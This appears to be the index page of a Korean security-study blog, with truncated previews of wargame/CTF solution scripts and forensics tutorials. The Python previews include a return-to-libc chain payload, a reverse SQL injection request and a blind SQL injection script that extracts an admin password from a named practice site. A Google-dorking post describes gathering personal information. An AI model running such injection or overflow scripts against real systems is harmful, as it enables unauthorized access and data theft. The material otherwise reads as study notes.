전체 글289

• rtl chain from socket import * HOST = ""PORT = 4444 s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x40\xa0\x04\x08"+"\x54\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x41\xa0\x04\x08"+"\x57\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x42\xa0\x04\x08"+"\x56\x81\x04\x08"payload += "\xa.. Security Study/Source 2015. 11. 21.

• sql injection reverse import urllibimport urllib2 url = ""req = urllib2.Request(url)sql = "union select 0x61646D696E 32%"data = "id=%00&pw=" + sql[::-1]#data = urllib.urlencode(data)req = urllib2.Request(url, data) req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')req.add_header('Cookie', 'PHPSESSID=') response = urllib2.urlopen(req)h.. Security Study/Source 2015. 11. 21.

• 소켓프로그래밍 from socket import * HOST = "" #hostPORT = 4444 #port s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260 #payload print s.recv(1024) #1024 byte reads.send(payload + "\n")print s.recv(1024)print s.recv(1024) Security Study/Source 2015. 11. 21.

• Blind Sql Injection #http2,1)%3C%27N%27)--+&pw=adminimport urllibimport urllib2 ans =""ans2="" for i in range(1,11): for j in range(33,127) : url1 = "http://codeshell.kr/probs/unsolvable/index.php?Username=admin'+and(substring(Password," url1=url1+str(i)+",1)='" url1=url1+chr(j)+"')--+&pw=1" try: #print url1; req = urllib2.Request(url1) print 1111 req.add_header('cookie',"PHPSESSID=") res = urllib2.urlopen(req) dat.. Security Study/Source 2015. 11. 21.

• Base 64 encoding import base64 str64=""str64=base64.b64encode(str64.encode('ascii'))for i in range(1,11): str64=base64.encodestring(str64) str64=str64.decode("utf-8")print(str64.replace("\n","")) Security Study/Source 2015. 11. 21.

• 

  구글 해킹 구글 해킹이란?이름만 보면 구글을 해킹하는 듯한 느낌이 든다. 그러나 이것이 구글 해킹이아니라 구글의 연산자들을 이용하여 알고자 하는 정보를 뽑아 내는 것을 말한다.구글에는 많은 연산자가 있다. 이를 이용하여 개인 정보 뿐만 아니라 많은 신상 정보를 알아 낼수 있다. 과연 구글 해킹이 얼마나 위험할까? 이러한 식으로 저자를 검색하면 이러한 블로그들이 나오는 것을 알수 있다.과연 이름이나 전화번호 같은 개인정보를 알고 있는 상황에서 검색을 하면 더 더욱 많은 자료와 더 많은 정보가 나올 것이다. 구글 해킹의 일반적인 공격을 보면따옴표(" ")따옴표를 이용하면 여러개 단어를 묶어서 검색할 수 있다. 예를들어, Pwn&Play z3alous라고 검색을 하면 ~ Pwn&Play ~ z3alous 로 검색이 되지.. Security Study/Web 2015. 11. 21.

• 

  lsof 명령어 프로세스 정보를 확인하기 위한 명령어는 lsof라는 명령어가 있다. lsof라는 명령어는 LiSt Open Files의 약자로 이름 그대로 수행하는 프로그 램이다. 좀 더 구체적으로, 현재 System에서 돌아가는 모든 Process에 의해서 Open된 파일들에 대한 정보를 보여준다.사용법은1. 어떤 특정한 파일을 사용하고 있는 프로세스들에 대한 정보를 알고 싶을 때,lsof 2. 어떤 파일 시스템 내에, 그렇게 큰 크기의 파일들을 찾을 수 없는데도 불구하고, Available Space가 0을 향해서 치닫고 있을 수도 있다. lsof 3. 긴급히 어떤 파일 시스템을 unmount해야 할 때, lsof는 파일 시스템 내에 있는 파일들에 대해서 억세스하고 있는 프로세스들을 다 찾아줄 수 있다.lsof 4... For3nsic/Forensic 2015. 11. 20.

• 

  volatility 사용법 3 printkey 이 명령어는 레지스트리 키값을 보여준다. netscan이 명령어는 활성화된 네트워크 정보를 알려준다.(windows 7에서만 사용가능) connections명령어를 이용하여 네트워크를 검사한다.여기서 더 자세히 알기위해 밑의 명령어를 사용한다. connscan 이 명령어는 위의 명령어와 같지만 이미 끊어진 네트워크도 나타내 준다. ] yarascan이명령어는 yara를 이용하여 유니코드 등을 검색하여 준다. For3nsic/The Art of Memory Forensic 2015. 11. 19.

• 

  volatility 사용법 2 kpcrscan이는 Finding Object Roots in Vista 에 묘사된 것처럼 자체참조 멤버들을 체크함으로써 잠재적 KPCR 구조들을 스캔하기 위하여 사용되는 명령어이다.IDT 와 GDT 주소, current,idle, 그리고 다음 쓰레드들, CPU 숫자, 벤더&속도, 그리고 CR3 값들을 포함하는 각각의 프로세서에 대한 자세한 세부 정보들에 대해 알아보기 위해 사용한다. 또한 이명령어를 사용하기 위해 profile이란 명령어를 사용해야하는데. profile 은 imageinfo명령어를 이용하여 알수있다. pslist이 명령어는 시스템의 프로세스들을 보여준다. PsActiveProcessHead 를 가리키는 이중연결리스트를 지나가며 오프셋, 프로세스 이름, 프로세스 ID, 부모 프로세스 ID.. For3nsic/The Art of Memory Forensic 2015. 11. 19.

• 

  Volatility 사용법 Volatility의 사용법에 앞써 사용을 하기위해 명령어를 알아야한다.먼저 -h 옵션을 줌으로 명령어 들을 볼수 있다. 또한 값을 저장하기 위해서는 명령어다음 > filename.txtWindowns Mac \ Windows 와 Mac이랑 명령어가 비슷한 거 같다. 이하 Mac으로만 하겠슴... 여기서 모르는 명령어를 찾아보며 해보면 되겠고 먼저 imageinfo 명령어를 사용해보겠다. imageinfo명령어는 다른 플러그인을 사용할 때 --profile=PROFILE----을 파라미터로 해야하는 제안된 프로파일을 알려주는 명령어이다.명령어를 사용하기위해 파일을 넣어야하는데... 명령어 사용방법은 vol.py -f For3nsic/The Art of Memory Forensic 2015. 11. 18.

• 

  Memory Forensic Volatility 설치 + 실행 요즘 MacBook을 사용하시는 하시는 분들이 많아서 일단 설치는 맥북위주로 하고 또한 사용법은 맥과 윈도우가 비슷 하므로 설명을 진행 하겠습니다.맥 같은 경우에는 윈도우와 다르게 터미널이라는 기능을 가지고 있어요!!! 터미널 리눅스에서 많이 사용하는건데 ... 이를 보면 맥이 유닉스나 리눅스 기반이라는 것을 알수 있을 껍니다.먼저 volatility를 설치하기위 해터미널을 열고 brew install volatility를 쳐주세요그럼 이러하게 다운 받는 것을 볼 수 있으실 껍니다.이렇게 다운 로드를 다받으시면 윈도우 사용자 분들은 CMD창에서 실행을 할껍니다. 어떻게 실행하냐 WINDOWS 이렇게 CMD창에서 실행시킵니다. 앞에 경로를 찾아가려니 힘들죠? 설치를 하고나시면 폴더있는데 그폴더에서 쉬프트(.. For3nsic/The Art of Memory Forensic 2015. 11. 18.

• 

  FTK Imager 알아보기 2 FTK Imager에서 메모리 캡쳐 하기 FTK Imager기능 중에서 메모리 캡쳐기능이있다.먼저 메모리 칩같이 생긴 것을 클릭한다. 클릭을 하면 이창이 나오는데 메모리 캡쳐가 되면 수집된 파일을 저장할 목적지 경로를 설정 하는 곳이다. 경로를 설정하고 Capture Memory를 이용하여 캡쳐를 시작한다. 이는 또한 옵션으로 Pagefile.sys 파일을 포함하고 AD1증거 파일 형식으로 만들 수 있다. 윈도우 상에서는 실행중인 레지스트리 파일을 복사하거나 저장할 수 없다. 이경우 FTK를 이용하여 보호된 레지스터를 얻고, 복사할 레코드를 얻을 수 있다. 메뉴바에서 표시된 것을 클릭하면 이러한 창이 뜨는데 이창에서는 얻어낸 파일을 저장할 폴더를 정해 주는 것이다.선택항목은 암호를 복구할 것인지 전체 레.. For3nsic/Forensic 2015. 11. 17.